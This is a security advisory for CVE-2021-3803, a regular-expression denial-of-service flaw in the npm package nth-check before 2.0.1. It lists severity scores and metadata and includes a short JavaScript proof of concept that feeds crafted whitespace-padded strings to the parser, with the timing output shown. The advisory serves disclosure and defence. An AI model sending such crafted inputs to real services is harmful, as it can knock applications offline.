CVE-2021-3803 – nth-check

Package

Manager: npm
Name: nth-check
Vulnerable Version: >=0 <2.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00115 pctl0.30885

Details

Inefficient Regular Expression Complexity in nth-check There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks. The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?` with quantified overlapping adjacency and can be exploited with the following code. **Proof of Concept** ```js // PoC.js var nthCheck = require("nth-check") for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = '2n' + ' '.repeat(i*10000)+"!"; try { nthCheck.parse(attack_str) } catch(err) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } } ``` **The Output** ``` attack_str.length: 10003: 174 ms attack_str.length: 20003: 1427 ms attack_str.length: 30003: 2602 ms attack_str.length: 40003: 4378 ms attack_str.length: 50003: 7473 ms ```

Metadata

Created: 2021-09-20T20:47:31Z
Modified: 2023-09-13T21:49:54Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-rp65-9cf3-cjxr/GHSA-rp65-9cf3-cjxr.json
CWE IDs: ["CWE-1333"]
Alternative ID: GHSA-rp65-9cf3-cjxr
Finding: F211
Auto approve: 1